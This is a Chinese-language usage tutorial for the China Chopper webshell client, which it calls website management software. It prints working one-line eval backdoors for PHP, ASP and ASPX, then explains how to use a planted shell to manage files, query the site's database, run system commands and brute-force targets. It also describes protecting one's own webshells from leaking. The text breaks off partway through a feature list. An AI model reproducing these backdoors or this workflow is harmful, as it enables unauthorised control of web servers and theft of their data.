0x01 介紹
中國菜刀是一款專業的網站管理軟件,用途廣泛,使用方便,小巧實用。只要支持動態腳本的網站,都可以用中國菜刀來進行管理!在非簡體中文環境下使用,自動切換到英文界面。UINCODE方式編譯,支持多國語言輸入顯示。(引用於百度百科中國菜刀_百度百科)
菜刀的界面:
0x02 使用
1.常見的管理
右鍵空白處->添加
添加SHELL -> 進行相關的配置。
我的配置:
密碼:key
腳本類型:PHP
最后->點擊添加
相關的介紹:
這里的WEBSHELL是我們常說的一句話木馬:
PHP一句話木馬:<?php @eval($_POST['key']);?>
ASP一句話木馬:<%eval request['key']%>
ASPX一句話木馬:<%@ Page Language="Jscript"%><%eval(Request.Item["key"],"unsafe");%>
眼尖的童鞋已經看到了三個里面都帶有key這個單詞,沒錯這個就是密碼,大家可以自行修改為自己使用的密碼。
功能概述:
文件管理:
打開方式 [右鍵WEBSHELL->單擊文件管理]
管理方式 [右鍵上圖中方框內的任何區域進行管理]
數據庫管理:
打開方式 [右鍵WEBSHELL->數據庫管理]
可以看到是空白的,這時候就需要配置數據庫信息了。
配置方式1.[單擊配置]
出現了一個配置窗口。(前提你要有網站數據庫的配置信息才可以進行配置)
我的配置信息:
數據庫類型:Mysql
用戶名:root
密碼:root
配置方式 2.[選擇數據庫]
可以看到紅色方框那邊有MYSQL、MSSQL、MSSQL2、ORACLE等數據庫類型。
我是Mysql的就選擇mysql的示例:
配置后 [單擊提交]:
管理方式:
虛擬終端:
打開方式 [右鍵WEBSHELL->單擊虛擬終端]
紅色方框里是系統的一些信息。我們在D:\WWW\>后面輸入相應的cmd命令即可(Linux就輸入shell命令)
2.網站掃描
打開方式 [單擊菜刀圖標->單擊網站掃描]
(也可以在軟件里使用快捷鍵Alt+K去打開)
使用方法:
把http://www.http://maicaidao.com替換成自己的測試站點即可。
功能:
1.反向IP(reverse_ip)
2.爬蟲(spider)
3.爆破(crack)
其他按照這些提示都應該能懂就不一一去說了。
3.瀏覽器功能
打開方法如上圖示意。
對着網頁進行右擊:
上圖是一些瀏覽器方面的功能。
單擊擴展功能:
可以進行cookie的修改。
同時也可以單擊菜刀圖標->瀏覽器:
可以進行選擇:
#代表開啟 可以單擊進行取消開啟。
4.其他功能
第一:設置菜刀啟動密碼(防止自己的WEBSHELL泄露出去)
打開方式 [單擊菜刀圖標->單擊設置啟動密碼]
點擊是,就成功設置密碼為test。
然后我們關掉菜刀再打開菜刀:
輸入我們的密碼再可以設置新的密碼:
我相信着點英語難不倒各位也不解釋了。
也可以把啟動密碼取消掉:
第二:日程提醒,使用方法如下:
